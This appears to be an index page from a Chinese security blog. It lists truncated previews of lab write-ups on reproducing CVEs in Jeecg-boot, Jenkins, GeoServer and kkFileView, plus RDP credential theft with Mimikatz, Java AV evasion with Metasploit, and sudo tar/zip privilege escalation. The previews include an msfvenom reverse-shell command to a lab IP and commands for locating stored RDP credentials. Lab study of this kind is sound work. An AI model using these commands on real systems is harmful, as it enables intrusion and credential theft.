encrypt-labs靶场搭建 encrypt-labs-js 靶场下载 靶场下载地址: https://github.com/SwagXz/encrypt-labs 这里选择使用docker进行搭建靶场: git clone https://github.com/Ta0ing/encrypt-labs-docker.git 下载好之后就是启动靶场 docker
Jeecg-boot漏洞复现模板注入命令执行 漏洞复现 CVE-2023-4450(queryFieldBySql) 漏洞搭建 漏洞搭建使用Vulhub:vulhub/jeecg-boot/CVE-2023-4450 漏洞复现 靶场启动后访问8080端口 相关接口: /jeecg-boot/jmreport/list` 查看JimuReport页面 /j
Jenkins后台内存马注入及相关命令 漏洞复现 漏洞搭建 通过Vulhub进行漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897 账号/密码:admin/vulhub WEB服务端口8080 漏洞复现 内存马注入 通过账号密码登录后台,找到Scrip
GeoServer(CVE-2024-36401)漏洞复现 漏洞复现 漏洞环境 漏洞搭建使用vulhub,https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 影响版本 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前。 漏洞复现 环境均为自行搭建 靶场j
kkFileView-RCE漏洞复现 漏洞复现 漏洞影响版本 kkFileView 4.4.0-beta以前 漏洞搭建 使用vulhub进行漏洞环境搭建 Kali IP & 目标 IP :192.168.88.206 漏洞复现 命令执行 方法:利用poc.py生成一个恶意的zip文件,并创建一个.odt文件。
Windows-RDP-Mimikatz凭证横向 Windows 横向过程 前提是主机上保存过RDP凭证,查看命令(Administrator管理员权限): cmdkey /list 第一步:查看凭证 查看凭证文件所在位置,命令: dir /a %USERPROFILE%\AppData\Local\Microsof
MSF-Java-免杀初体验 免杀 前言 公众号看到的文章,说生成的jar包来上线机器,C看不懂java利用AI还可以看吧。 生成SHELL 利用kali生成反弹shell的JAR包: 命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.88.206 LPORT=444
asp.NET ViewState反序列化 漏洞复现 简单ViewState反序列化漏洞复现 漏洞环境搭建 文件编译 hello.aspx文件内容: <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="hello.aspx.cs" Inherits="ViewStateTe
配置错误的Tar、Zip提权(Linux) 提权 环境搭建 创建一个普通用户test useradd test 添加用户 passwd test 设置用户密码 使用root用户修改/etc/sudoers配置文件 test ALL=(root) NOPASSWD: /bin/tar, /usr/bin/zip
apk反编译 工具 相关工具 dex2jar,将java.dex编译成jar文件。下载地址:https://github.com/pxb1988/dex2jar/ jd-gui.jar,反编译jar文件,查看java源码。下载地址:https://github.com/java-decompiler/jd-gui de